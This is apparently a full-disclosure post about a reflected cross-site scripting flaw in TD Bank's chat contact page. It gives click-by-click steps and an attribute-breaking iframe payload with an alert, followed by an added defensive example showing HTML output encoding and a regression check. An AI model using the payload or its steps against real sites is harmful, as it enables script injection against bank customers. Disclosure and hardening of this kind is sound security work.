Thursday, 16 March 2023

Full Disclosure - TDBank Reflected Cross-Site Scripting

Application

  • TDBank chat web page


Information

  • Input not validated
  • Reflected Cross-Site Scripting flaw


Exploit

XSS #1

1. Browse to Online Store

1. Browse to Personal Banking -> Contact Us

2. Select Pages -> Have General Question -> Ask now

3. Paste Payload -> TD Bank SWIFT/BIC code"><iframe width="1000px" height="450px" src="" onload=alert('XSS')>
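
Added example (not part of the original post, and not TD Bank's code): why the unvalidated input above becomes markup, and how output encoding stops it. It assumes the chat page echoes the question into a double-quoted value attribute; the template and the function names renderVulnerable, renderHardened, escapeHtml and tagNames are hypothetical.

```javascript
// Constructed sample input: the payload string from step 3 of this post.
const PAYLOAD = `TD Bank SWIFT/BIC code"><iframe width="1000px" height="450px" src="" onload=alert('XSS')>`;

// Assumed (hypothetical) template: the question is reflected unencoded
// inside a double-quoted attribute, so a '"' in the input ends the attribute.
function renderVulnerable(question) {
  return `<input type="text" name="question" value="${question}">`;
}

// Encode the characters that can close an attribute value or open a tag.
const HTML_ENTITIES = {
  '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;',
};
function escapeHtml(text) {
  return String(text).replace(/[&<>"']/g, (ch) => HTML_ENTITIES[ch]);
}

// Same template, but the reflected value is encoded for the HTML context.
function renderHardened(question) {
  return `<input type="text" name="question" value="${escapeHtml(question)}">`;
}

// Minimal tag scanner for checking rendered output: returns the names of
// the elements present. Quoted attribute values are skipped, so a '>'
// inside quotes does not end a tag.
function tagNames(html) {
  const names = [];
  const re = /<([a-zA-Z][a-zA-Z0-9]*)(?:"[^"]*"|'[^']*'|[^'">])*>/g;
  let m;
  while ((m = re.exec(html)) !== null) names.push(m[1].toLowerCase());
  return names;
}

// The unencoded reflection yields an extra iframe element; the encoded
// reflection yields only the intended input element.
console.log('vulnerable:', tagNames(renderVulnerable(PAYLOAD)));
console.log('hardened:  ', tagNames(renderHardened(PAYLOAD)));
```

The same tagNames check can be used in a regression test: render the page with the reported payload and fail the build if any element other than the expected ones appears.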


